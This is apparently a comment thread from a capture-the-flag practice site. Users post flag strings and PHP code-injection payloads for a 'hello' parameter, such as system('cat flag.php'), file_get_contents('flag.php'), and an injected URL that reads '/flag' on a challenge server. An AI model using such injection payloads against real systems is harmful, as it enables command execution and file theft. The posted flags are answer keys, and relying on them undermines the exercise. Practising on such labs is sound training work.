mayanqing @ 2024-05-29 23:19:53 👍0
flag{f6ad1eb260cd2bc6ad001eed51e855d0}
wanwanla @ 2024-05-22 23:19:53 👍0
flag{e40a76c58ccdc34f3f6b4a361443ea13}
18993762527 @ 2024-05-07 23:19:53 👍0
system("tac flag.php")
南城,北风 @ 2024-05-07 23:19:53 👍0
?hello=file('flag.php')
wangyihao @ 2024-04-07 23:19:53 👍0
hello=system("cat flag.php")
18092952956 @ 2024-03-07 23:19:53 👍0
show_source('flag.php')
BlueL1ght @ 2024-03-07 23:19:53 👍0
system("cat+flag.php")
zhuleixy @ 2024-03-07 23:19:53 👍0
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
15738762315 @ 2024-02-07 23:19:53 👍0
flag{6dd6075616f5943ab53cff237ff1a63b}
file_get_contents()函数读取服务器任意文件 ?hello=file_get_contents('flag.php')